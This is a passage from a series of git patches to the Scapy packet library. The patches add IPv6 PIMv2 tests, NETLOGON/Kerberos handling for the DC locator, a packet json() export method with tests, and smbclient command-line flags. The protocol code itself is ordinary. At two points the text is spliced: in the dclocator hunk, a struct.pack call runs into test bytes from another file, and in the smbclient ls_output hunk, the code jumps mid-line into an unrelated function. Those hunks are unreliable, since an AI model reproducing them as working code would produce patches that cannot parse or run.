b'\x01\x00^\x00\x00\r\xc2\x02=\x80\x00\x01\x08\x00E\xc0\x006\x00\x8b\x00\x00\x01g\xcd\xfb\n\x00\x00\x0e\xe0\x00\x00\r#\x00Z\xe5\x01\x00\n\x00\x00\r\x00\x01\x00\xd2\x01\x00\x00 \xef{{{\x00\x01\x00\x00\x01\x00\x07 \x01\x01\x01\x01' @@ -117,14 +116,160 @@ assert raw(join_pkt) == b'\x01\x00^\x00\x00\r\xc2\x02=\x80\x00\x01\x08\x00E\xc0\ prune_pkt = Ether(dst="01:00:5e:00:00:0d", src="c2:02:3d:80:00:01")/IP(version=4, ihl=5, tos=0xc0, id=139, ttl=1, proto=103, src="10.0.0.2", dst="224.0.0.13")/\ - PIMv2Hdr(version=2, type=3, reserved=0)/\ - PIMv2JoinPrune(up_addr_family=1, up_encoding_type=0, up_neighbor_ip="10.0.0.1", reserved=0, num_group=1, holdtime=210, - jp_ips=[PIMv2GroupAddrs(addr_family=1, encoding_type=0, bidirection=0, reserved=0, admin_scope_zone=0, - mask_len=32, gaddr="239.123.123.123", - prune_ips=[PIMv2PruneAddrs(addr_family=1, encoding_type=0, rsrvd=0, sparse=0, wildcard=0, rpt=0, - mask_len=32, src_ip="172.16.40.10")]) + PIMv2Hdr(version=2, type=3, reserved=0)/\ + PIMv2JoinPrune(up_addr_family=1, up_encoding_type=0, up_neighbor_ip="10.0.0.1", reserved=0, num_group=1, holdtime=210, + jp_ips=[PIMv2GroupAddrs(addr_family=1, encoding_type=0, bidirection=0, reserved=0, admin_scope_zone=0, + mask_len=32, gaddr="239.123.123.123", + prune_ips=[PIMv2PruneAddrs(addr_family=1, encoding_type=0, rsrvd=0, sparse=0, wildcard=0, rpt=0, + mask_len=32, src_ip="172.16.40.10")]) ] ) assert raw(prune_pkt) == b'\x01\x00^\x00\x00\r\xc2\x02=\x80\x00\x01\x08\x00E\xc0\x006\x00\x8b\x00\x00\x01g\xce\x07\n\x00\x00\x02\xe0\x00\x00\r#\x00\x8f\xd8\x01\x00\n\x00\x00\x01\x00\x01\x00\xd2\x01\x00\x00 \xef{{{\x00\x00\x00\x01\x01\x00\x00 \xac\x10(\n' + + + + +#################################################################################### +# IPv6 added +#################################################################################### + + += IPv6 PIMv2 Hello - instantiation + +hello_data6 = b'33\x00\x00\x00\r\x02\x00\x00\x00\x00\x01\x86\xddk\x80\x00\x00\x008g\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r \x00\xe4G\x00\x01\x00\x02\x00i\x00\x02\x00\x04\x01\xf4\t\xc4\x00\x13\x00\x04\x00\x00\x00\x01\x00\x14\x00\x04:I\x8b\xa3\x00\x18\x00\x12\x02\x00 \x01\xa7\xff@\n"\t\x00\x00\x00\x00\x00\x00\x00\x02' + +hello_pkt6 = Ether(hello_data6) + +assert (hello_pkt6[PIMv2Hdr].version == 2) +assert (hello_pkt6[PIMv2Hdr].type == 0) +assert (len(hello_pkt6[PIMv2Hello].option) == 5) +assert (hello_pkt6[PIMv2Hello].option[0][PIMv2HelloHoldtime].type == 1) +assert (hello_pkt6[PIMv2Hello].option[0][PIMv2HelloHoldtime].holdtime == 105) +assert (hello_pkt6[PIMv2Hello].option[1][PIMv2HelloLANPruneDelay].type == 2) +assert (hello_pkt6[PIMv2Hello].option[1][PIMv2HelloLANPruneDelay].value[0][PIMv2HelloLANPruneDelayValue].t == 0) +assert (hello_pkt6[PIMv2Hello].option[1][PIMv2HelloLANPruneDelay].value[0][PIMv2HelloLANPruneDelayValue].propagation_delay == 500) +assert (hello_pkt6[PIMv2Hello].option[1][PIMv2HelloLANPruneDelay].value[0][PIMv2HelloLANPruneDelayValue].override_interval == 2500) +assert (hello_pkt6[PIMv2Hello].option[2][PIMv2HelloDRPriority].type == 19) +assert (hello_pkt6[PIMv2Hello].option[2][PIMv2HelloDRPriority].dr_priority == 1) +assert (hello_pkt6[PIMv2Hello].option[3][PIMv2HelloGenerationID].type == 20) + +repr(PIMv2HelloLANPruneDelayValue(t=1)) + += IPv6 PIMv2 Join/Prune - instantiation + +jp_data6join = b'33\x00\x00\x00\r\x02\x00\x00\x00\x00\x01\x86\xddk\x80\x00\x00\x00Fg\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r#\x00\xc6X\x02\x00\xfe\x80\x00\x00\x00\x00\x00\x00\xfc\x87\xff\xff\xfe\x00\x01A\x00\x01\x00\xd2\x02\x00\x00\x80\xff>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x01\x00\x01\x00\x00\x02\x00\x04\x80$\x04\x80\x00\x00\x01\xf0\x01\x00\x00\x00\x00\x00\x00\x00\x01' + +jp_pkt6 = Ether(jp_data6join) + +assert (jp_pkt6[PIMv2Hdr].version == 2) +assert (jp_pkt6[PIMv2Hdr].type == 3) +assert (jp_pkt6[PIMv2JoinPrune].up_addr_family == 2) +assert (jp_pkt6[PIMv2JoinPrune].up_encoding_type == 0) +assert (jp_pkt6[PIMv2JoinPrune].up_neighbor_ip == 'fe80::fc87:ffff:fe00:141') +assert (jp_pkt6[PIMv2JoinPrune].reserved == 0) +assert (jp_pkt6[PIMv2JoinPrune].num_group == 1) +assert (jp_pkt6[PIMv2JoinPrune].holdtime == 210) +assert (jp_pkt6[PIMv2JoinPrune].num_group == len(jp_pkt6[PIMv2JoinPrune].jp_ips)) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].addr_family == 2) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].encoding_type == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].bidirection == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].reserved == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].admin_scope_zone == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].mask_len == 128) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].gaddr == 'ff3e::8000:1') +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_joins == 1) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_joins == len(jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips)) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].addr_family == 2) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].encoding_type == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].rsrvd == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].sparse == 1) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].wildcard == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].rpt == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].mask_len == 128) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips[0][PIMv2JoinAddrs].src_ip == '2404:8000:1:f001::1') +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_prunes == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_prunes == len(jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips)) + + + +jp_data6prune = b'33\x00\x00\x00\r\x02\x00\x00\x00\x00\x01\x86\xddk\x80\x00\x00\x00Fg\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r#\x00\xc6X\x02\x00\xfe\x80\x00\x00\x00\x00\x00\x00\xfc\x87\xff\xff\xfe\x00\x01A\x00\x01\x00\xd2\x02\x00\x00\x80\xff>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\x01\x02\x00\x04\x80$\x04\x80\x00\x00\x01\xf0\x01\x00\x00\x00\x00\x00\x00\x00\x01' + +jp_pkt6 = Ether(jp_data6prune) + +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].addr_family == 2) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].encoding_type == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].bidirection == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].reserved == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].admin_scope_zone == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].mask_len == 128) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].gaddr == 'ff3e::8000:1') +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_joins == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_joins == len(jp_pkt6[PIMv2JoinPrune].jp_ips[0].join_ips)) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_prunes == 1) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].num_prunes == len(jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips)) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].addr_family == 2) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].encoding_type == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].rsrvd == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].sparse == 1) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].wildcard == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].rpt == 0) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].mask_len == 128) +assert (jp_pkt6[PIMv2JoinPrune].jp_ips[0].prune_ips[0][PIMv2PruneAddrs].src_ip == '2404:8000:1:f001::1') + + + + += IPv6 PIMv2 Hello - build + +hello_delay_pkt6 = Ether(dst='33:33:00:00:00:0d', src='02:00:00:00:00:01')/ \ + IPv6(tc=0xb8, nh=103, hlim=1, src='fe80::ff:fe00:1', dst='ff02::d')/ \ + PIMv2Hdr()/ \ + PIMv2Hello(option=[ \ + PIMv2HelloHoldtime(holdtime=105), + PIMv2HelloLANPruneDelay(value=[PIMv2HelloLANPruneDelayValue(propagation_delay=500, override_interval=2500)]), + PIMv2HelloDRPriority(dr_priority=1), + PIMv2HelloGenerationID(generation_id=977898403), + PIMv2HelloAddrList(value=[PIMv2HelloAddrListValue(addr_family=2,prefix='2001:a7ff:400a:2209::2')]), + ]) + + +assert raw(hello_delay_pkt6) == hello_data6 + + + + + += IPv6 PIMv2 Join/Prune - build + + +join_pkt6 = Ether(dst='33:33:00:00:00:0d', src='02:00:00:00:00:01')/\ + IPv6(tc=184, nh=103, hlim=1, src='fe80::ff:fe00:1', dst='ff02::d')/ \ + PIMv2Hdr(version=2, type=3, reserved=0)/ \ + PIMv2JoinPrune(jp_ips=[ \ + PIMv2GroupAddrs(join_ips=[ + PIMv2JoinAddrs(addr_family=2, sparse=1, wildcard=0, rpt=0, mask_len=128, src_ip='2404:8000:1:f001::1')], + addr_family=2, admin_scope_zone=0, mask_len=128, gaddr='ff3e::8000:1', + num_joins=1, num_prunes=0)], + up_addr_family=2, up_neighbor_ip='fe80::fc87:ffff:fe00:141', num_group=1, holdtime=210) + + +assert raw(join_pkt6) == jp_data6join + + + +prune_pkt6 = Ether(dst='33:33:00:00:00:0d', src='02:00:00:00:00:01')/ \ + IPv6(tc=184, nh=103, hlim=1, src='fe80::ff:fe00:1', dst='ff02::d')/ \ + PIMv2Hdr()/ \ + PIMv2JoinPrune(jp_ips=[ \ + PIMv2GroupAddrs(prune_ips=[ \ + PIMv2PruneAddrs(addr_family=2, sparse=1, wildcard=0, rpt=0, mask_len=128, src_ip='2404:8000:1:f001::1')], + addr_family=2, mask_len=128, gaddr='ff3e::8000:1', + num_joins=0, num_prunes=1)], + up_addr_family=2, up_neighbor_ip='fe80::fc87:ffff:fe00:141', num_group=1, holdtime=210) + + +assert raw(prune_pkt6) == jp_data6prune + + From e94fba098e26840908a79728a78c4783f90357e2 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 21 Feb 2024 22:03:19 +0100 Subject: [PATCH 1217/1632] Support all versions of NETLOGON_SAM_LOGON* --- scapy/layers/kerberos.py | 6 +- scapy/layers/ldap.py | 21 +++- scapy/layers/smb.py | 213 +++++++++++++++++++++++++------------ test/scapy/layers/ldap.uts | 50 +++++++++ 4 files changed, 216 insertions(+), 74 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 01fc1dc0ada..8689437fafa 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -1723,7 +1723,8 @@ def m2i(self, pkt, s): # 24: KDC_ERR_PREAUTH_FAILED # 25: KDC_ERR_PREAUTH_REQUIRED return MethodData(val[0].val, _underlayer=pkt), val[1] - elif pkt.errorCode.val in [41, 60]: + elif pkt.errorCode.val in [18, 41, 60]: + # 18: KDC_ERR_CLIENT_REVOKED # 41: KRB_AP_ERR_MODIFIED # 60: KRB_ERR_GENERIC return KERB_ERROR_DATA(val[0].val, _underlayer=pkt), val[1] @@ -2716,7 +2717,8 @@ def _process_padatas_and_key(self, padatas): if padata.padataType == 0x13: # PA-ETYPE-INFO2 elt = padata.padataValue.seq[0] etype = elt.etype.val - salt = elt.salt.val + if etype != EncryptionType.RC4_HMAC: + salt = elt.salt.val elif padata.padataType == 133: # PA-FX-COOKIE self.fxcookie = padata.padataValue # Compute key if not already provided diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 9fed74ea7c0..e9cfd4505a0 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -16,6 +16,7 @@ import collections import socket +import struct import uuid from scapy.ansmachine import AnsweringMachine @@ -51,6 +52,7 @@ from scapy.layers.gssapi import GSSAPI_BLOB from scapy.layers.kerberos import _ASN1FString_PacketField from scapy.layers.smb import ( + NETLOGON, NETLOGON_SAM_LOGON_RESPONSE_EX, ) @@ -648,7 +650,9 @@ def make_reply(self, req): @conf.commands.register -def dclocator(realm, qtype="A", mode="ldap", port=None, timeout=1, debug=0): +def dclocator( + realm, qtype="A", mode="ldap", port=None, timeout=1, NtVersion=None, debug=0 +): """ Perform a DC Locator as per [MS-ADTS] sect 6.3.6 or RFC4120. @@ -665,8 +669,17 @@ def dclocator(realm, qtype="A", mode="ldap", port=None, timeout=1, debug=0): This is cached in conf.netcache.dclocator. """ + if NtVersion is None: + # Windows' default + NtVersion = ( + 0x00000002 # V5 + | 0x00000004 # V5EX + | 0x00000010 # V5EX_WITH_CLOSEST_SITE + | 0x01000000 # AVOID_NT4EMUL + | 0x20000000 # IP + ) # Check cache - cache_ident = ";".join([realm, qtype, mode]).lower() + cache_ident = ";".join([realm, qtype, mode, str(NtVersion)]).lower() if cache_ident in _dclocatorcache: return _dclocatorcache[cache_ident] # Perform DNS-Based discovery (6.3.6.1) @@ -758,7 +771,7 @@ def dclocator(realm, qtype="A", mode="ldap", port=None, timeout=1, debug=0): filter=LDAP_FilterEqual( attributeType=ASN1_STRING(b"NtVer"), attributeValue=ASN1_STRING( - b"\x16\x00\x00!" + struct.pack("\x03DC1\xc0>d\x00\xa8\xc0}\xf3\x03\x00\x03\x00\x00\x00\xff\xff\xff\xff') + +assert pkt.NtVersion == 3 +assert pkt.NullGuid == uuid.UUID('00000000-0000-0000-0000-000000000000') +assert pkt.DnsForestName == b"domain.local." +assert pkt.DnsDomainName == b"domain.local." +assert pkt.DnsHostName == b"DC1.domain.local." +assert pkt.Flags == 0x3f37d + += Dissect NETLOGON_SAM_LOGON_RESPONSE_NT40 - V1 + +pkt = NETLOGON(b'\x13\x00\\\x00\\\x00D\x00C\x001\x00\x00\x00\x00\x00D\x00O\x00M\x00A\x00I\x00N\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff') + +assert pkt.NtVersion == 1 +assert pkt.UnicodeLogonServer == r"\\DC1" +assert pkt.UnicodeDomainName == "DOMAIN" + From ce2c2d7fb1809df6c21cced1e12c958746280f05 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 22 Feb 2024 13:17:02 +0100 Subject: [PATCH 1218/1632] Add json() (#4283) --- doc/scapy/usage.rst | 1 + scapy/asn1/asn1.py | 13 +++++-- scapy/packet.py | 87 +++++++++++++++++++++++++++++++++++++-------- scapy/volatile.py | 9 +++-- test/regression.uts | 42 ++++++++++++++++++++++ 5 files changed, 131 insertions(+), 21 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index af2e3a8bbf2..67b3f02a05c 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -157,6 +157,7 @@ pkt.decode_payload_as() changes the way the payload is decoded pkt.psdump() draws a PostScript diagram with explained dissection pkt.pdfdump() draws a PDF with explained dissection pkt.command() return a Scapy command that can generate the packet +pkt.json() return a JSON string representing the packet ======================= ==================================================== diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index fe4711126aa..0a101d16c7f 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -356,9 +356,16 @@ def __ne__(self, other): # type: (Any) -> bool return bool(self.val != other) - def command(self): - # type: () -> str - return "%s(%s)" % (self.__class__.__name__, repr(self.val)) + def command(self, json=False): + # type: (bool) -> Union[Dict[str, str], str] + if json: + if isinstance(self.val, bytes): + val = self.val.decode("utf-8", errors="backslashreplace") + else: + val = repr(self.val) + return {"type": self.__class__.__name__, "value": val} + else: + return "%s(%s)" % (self.__class__.__name__, repr(self.val)) ####################### diff --git a/scapy/packet.py b/scapy/packet.py index e6c6ff72b40..26f046a9771 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -14,6 +14,8 @@ """ from collections import defaultdict + +import json import re import time import itertools @@ -1694,39 +1696,90 @@ def decode_payload_as(self, cls): pp = pp.underlayer self.payload.dissection_done(pp) - def command(self): - # type: () -> str + def _command(self, json=False): + # type: (bool) -> List[Tuple[str, Any]] """ - Returns a string representing the command you have to type to - obtain the same packet + Internal method used to generate command() and json() """ f = [] - for fn, fv in self.fields.items(): + iterator: Iterator[Tuple[str, Any]] + if json: + iterator = ((x.name, self.getfieldval(x.name)) for x in self.fields_desc) + else: + iterator = iter(self.fields.items()) + for fn, fv in iterator: fld = self.get_field(fn) if isinstance(fv, (list, dict, set)) and not fv and not fld.default: continue if isinstance(fv, Packet): - fv = fv.command() + if json: + fv = {k: v for (k, v) in fv._command(json=True)} + else: + fv = fv.command() elif fld.islist and fld.holds_packets and isinstance(fv, list): - fv = "[%s]" % ",".join(map(Packet.command, fv)) + if json: + fv = [ + {k: v for (k, v) in x} + for x in map(lambda y: Packet._command(y, json=True), fv) + ] + else: + fv = "[%s]" % ",".join(map(Packet.command, fv)) elif fld.islist and isinstance(fv, list): - fv = "[%s]" % ", ".join( - getattr(x, 'command', lambda: repr(x))() - for x in fv - ) + if json: + fv = [ + getattr(x, 'command', lambda: repr(x))() + for x in fv + ] + else: + fv = "[%s]" % ",".join( + getattr(x, 'command', lambda: repr(x))() + for x in fv + ) elif isinstance(fv, FlagValue): fv = int(fv) elif callable(getattr(fv, 'command', None)): - fv = fv.command() + fv = fv.command(json=json) else: - fv = repr(fld.i2h(self, fv)) - f.append("%s=%s" % (fn, fv)) - c = "%s(%s)" % (self.__class__.__name__, ", ".join(f)) + if json: + if isinstance(fv, bytes): + fv = fv.decode("utf-8", errors="backslashreplace") + else: + fv = fld.i2h(self, fv) + else: + fv = repr(fld.i2h(self, fv)) + f.append((fn, fv)) + return f + + def command(self): + # type: () -> str + """ + Returns a string representing the command you have to type to + obtain the same packet + """ + c = "%s(%s)" % ( + self.__class__.__name__, + ", ".join("%s=%s" % x for x in self._command()) + ) pc = self.payload.command() if pc: c += "/" + pc return c + def json(self): + # type: () -> str + """ + Returns a JSON representing the packet. + + Please note that this cannot be used for bijective usage: data loss WILL occur, + so it will not make sense to try to rebuild the packet from the output. + This must only be used for a grepping/displaying purpose. + """ + dump = json.dumps({k: v for (k, v) in self._command(json=True)}) + pc = self.payload.json() + if pc: + dump = dump[:-1] + ", \"payload\": %s}" % pc + return dump + class NoPayload(Packet): def __new__(cls, *args, **kargs): @@ -1899,6 +1952,10 @@ def command(self): # type: () -> str return "" + def json(self): + # type: () -> str + return "" + def route(self): # type: () -> Tuple[None, None, None] return (None, None, None) diff --git a/scapy/volatile.py b/scapy/volatile.py index 3c48300a4b2..b60e1a018a7 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -108,9 +108,12 @@ def _command_args(self): # type: () -> str return '' - def command(self): - # type: () -> str - return "%s(%s)" % (self.__class__.__name__, self._command_args()) + def command(self, json=False): + # type: (bool) -> Union[Dict[str, str], str] + if json: + return {"type": self.__class__.__name__, "value": self._command_args()} + else: + return "%s(%s)" % (self.__class__.__name__, self._command_args()) def __eq__(self, other): # type: (Any) -> bool diff --git a/test/regression.uts b/test/regression.uts index 277ce90cdae..98140ea9a32 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1441,6 +1441,48 @@ assert answer.answers(query) conf.checkIPsrc = conf_checkIPsrc +############ +############ ++ command() / json() tests +~ command + += Test command() with normal packet + +pkt = IP(dst="127.0.0.1", src="127.0.0.1") / UDP(dport=12345, sport=654) +assert pkt.command() == "IP(src='127.0.0.1', dst='127.0.0.1')/UDP(sport=654, dport=12345)" + += Test json() with normal packet + +assert pkt.json() == '{"version": 4, "ihl": null, "tos": 0, "len": null, "id": 1, "flags": 0, "frag": 0, "ttl": 64, "proto": 17, "chksum": null, "src": "127.0.0.1", "dst": "127.0.0.1", "payload": {"sport": 654, "dport": 12345, "len": null, "chksum": null}}' + += Test command() with nested packet + +pkt = DNS(qd=[DNSQR(qtype="A", qname="google.com")]) +assert pkt.command() == "DNS(qd=[DNSQR(qname=b'google.com.', qtype=1)])" + += Test json() with nested packet + +assert pkt.json() == '{"length": null, "id": 0, "qr": 0, "opcode": 0, "aa": 0, "tc": 0, "rd": 1, "ra": 0, "z": 0, "ad": 0, "cd": 0, "rcode": 0, "qdcount": null, "ancount": null, "nscount": null, "arcount": null, "qd": [{"qname": "google.com.", "qtype": 1, "qclass": 1}]}' + += Test command() with ASN.1 packet + +pkt = KRB_AP_REP(bytes(KRB_AP_REP(encPart=EncryptedData()))) +assert pkt.command() == "KRB_AP_REP(pvno=ASN1_INTEGER(5), msgType=ASN1_INTEGER(15), encPart=EncryptedData(etype=ASN1_INTEGER(23), kvno=None, cipher=ASN1_STRING(b'')))" + += Test json(à with ASN.1 packet + +assert pkt.json() == '{"pvno": {"type": "ASN1_INTEGER", "value": "5"}, "msgType": {"type": "ASN1_INTEGER", "value": "15"}, "encPart": {"etype": {"type": "ASN1_INTEGER", "value": "23"}, "kvno": null, "cipher": {"type": "ASN1_STRING", "value": ""}}}' + += Test command() with meaningless payload + +pkt = PPTPStartControlConnectionReply() / IP(dst="127.0.0.1", src="127.0.0.1") +assert pkt.command() == "PPTPStartControlConnectionReply()/IP(src='127.0.0.1', dst='127.0.0.1')" + += Test json() with meaningless payload + +assert pkt.json() == '{"len": 156, "type": 1, "magic_cookie": 439041101, "ctrl_msg_type": 2, "reserved_0": 0, "protocol_version": 256, "result_code": 1, "error_code": 0, "framing_capabilities": 0, "bearer_capabilities": 0, "maximum_channels": 65535, "firmware_revision": 256, "host_name": "linux", "vendor_string": "", "payload": {"version": 4, "ihl": null, "tos": 0, "len": null, "id": 1, "flags": 0, "frag": 0, "ttl": 64, "proto": 0, "chksum": null, "src": "127.0.0.1", "dst": "127.0.0.1"}}' + + ############ ############ + Tests on padding From 9bc922289368a3e1eac16a74c55b1f694158cef3 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 22 Feb 2024 02:49:30 +0100 Subject: [PATCH 1219/1632] Support keywords in CLIUtil + improve smbclient --- scapy/layers/smbclient.py | 83 ++++++++++-- scapy/utils.py | 176 +++++++++++++++++++++----- test/scapy/layers/smbclientserver.uts | 21 +++ 3 files changed, 231 insertions(+), 49 deletions(-) diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index caaed106606..ef9657cf291 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -18,6 +18,7 @@ from scapy.base_classes import Net from scapy.config import conf from scapy.error import Scapy_Exception +from scapy.fields import UTCTimeField from scapy.supersocket import SuperSocket from scapy.utils import ( CLIUtil, @@ -677,7 +678,7 @@ def query_directory(self, FileId, FileName="*"): x.FileName, x.FileAttributes, x.EndOfFile, - x.sprintf("%LastWriteTime%"), + x.LastWriteTime, ) for x in res.files ] @@ -1076,6 +1077,8 @@ def _dir_complete(self, arg): def ls(self, parent=None): """ List the files in the remote directory + -t: sort by timestamp + -S: sort by size """ if self._require_share(): return @@ -1102,22 +1105,33 @@ def ls(self, parent=None): return files @CLIUtil.addoutput(ls) - def ls_output(self, results): + def ls_output(self, results, *, t=False, S=False): """ Print the output of 'ls' """ + fld = UTCTimeField( + "", None, fmt="", str(ex)) + return size + + @CLIUtil.addcommand(spaces=True, globsupport=True) + def get(self, file, _dest=None, _verb=True, *, r=False): """ Retrieve a file + -r: recursively download a directory """ if self._require_share(): return - fname = pathlib.PureWindowsPath(file).name - # Write the buffer to current path - local_pwd = self.localpwd / fname - with local_pwd.open("wb") as fd: - size = self._get_file(file, fd) - return fname, size + if r: + dirpar, dirname = self._parsepath(file) + return file, self._getr( + dirpar / dirname, # Remotely + _root=self.localpwd / dirname, # Locally + _verb=_verb, + ) + else: + fname = pathlib.PureWindowsPath(file).name + # Write the buffer + if _dest is None: + _dest = self.localpwd / fname + with _dest.open("wb") as fd: + size = self._get_file(file, fd) + return fname, size @CLIUtil.addoutput(get) def get_output(self, info): """ Print the output of 'get' """ - print("Retrieved file %s of size %s" % (info[0], human_size(info[1]))) + print("Retrieved '%s' of size %s" % (info[0], human_size(info[1]))) @CLIUtil.addcomplete(get) def get_complete(self, file): @@ -1318,7 +1373,7 @@ def get_complete(self, file): return [] return self._fs_complete(file) - @CLIUtil.addcommand(spaces=True) + @CLIUtil.addcommand(spaces=True, globsupport=True) def cat(self, file): """ Print a file diff --git a/scapy/utils.py b/scapy/utils.py index 5e8f9457573..e34934f3f94 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -3011,7 +3011,7 @@ def get_terminal_width(): def pretty_list(rtlst, # type: List[Tuple[Union[str, List[str]], ...]] header, # type: List[Tuple[str, ...]] - sortBy=0, # type: int + sortBy=0, # type: Optional[int] borders=False, # type: bool ): # type: (...) -> str @@ -3032,8 +3032,9 @@ def pretty_list(rtlst, # type: List[Tuple[Union[str, List[str]], ...]] # Windows has a fat terminal border _spacelen = len(_space) * (cols - 1) + int(WINDOWS) _croped = False - # Sort correctly - rtlst.sort(key=lambda x: x[sortBy]) + if sortBy is not None: + # Sort correctly + rtlst.sort(key=lambda x: x[sortBy]) # Resolve multi-values for i, line in enumerate(rtlst): ids = [] # type: List[int] @@ -3288,14 +3289,73 @@ def _depcheck(self) -> None: # provides completion to command commands_complete: Dict[str, Callable[..., List[str]]] = {} + @staticmethod + def _inspectkwargs(func: DecoratorCallable) -> None: + """ + Internal function to parse arguments from the kwargs of the functions + """ + func._flagnames = [ # type: ignore + x.name for x in + inspect.signature(func).parameters.values() + if x.kind == inspect.Parameter.KEYWORD_ONLY + ] + func._flags = [ # type: ignore + ("-%s" % x) if len(x) == 1 else ("--%s" % x) + for x in func._flagnames # type: ignore + ] + + @staticmethod + def _parsekwargs( + func: DecoratorCallable, + args: List[str] + ) -> Tuple[List[str], Dict[str, Literal[True]]]: + """ + Internal function to parse CLI arguments of a function. + """ + kwargs: Dict[str, Literal[True]] = {} + if func._flags: # type: ignore + i = 0 + for arg in args: + if arg in func._flags: # type: ignore + i += 1 + kwargs[func._flagnames[func._flags.index(arg)]] = True # type: ignore # noqa: E501 + continue + break + args = args[i:] + return args, kwargs + + @classmethod + def _parseallargs( + cls, + func: DecoratorCallable, + cmd: str, args: List[str] + ) -> Tuple[List[str], Dict[str, Literal[True]], Dict[str, Literal[True]]]: + """ + Internal function to parse CLI arguments of both the function + and its output function. + """ + args, kwargs = cls._parsekwargs(func, args) + outkwargs: Dict[str, Literal[True]] = {} + if cmd in cls.commands_output: + args, outkwargs = cls._parsekwargs(cls.commands_output[cmd], args) + return args, kwargs, outkwargs + @classmethod - def addcommand(cls, spaces: bool = False) -> Callable[[DecoratorCallable], DecoratorCallable]: # noqa: E501 + def addcommand( + cls, + spaces: bool = False, + globsupport: bool = False, + ) -> Callable[[DecoratorCallable], DecoratorCallable]: """ Decorator to register a command """ def func(cmd: DecoratorCallable) -> DecoratorCallable: cls.commands[cmd.__name__] = cmd cmd._spaces = spaces # type: ignore + cmd._globsupport = globsupport # type: ignore + cls._inspectkwargs(cmd) + if cmd._globsupport and not cmd._spaces: # type: ignore + raise ValueError("Cannot use globsupport without spaces.") return cmd return func @@ 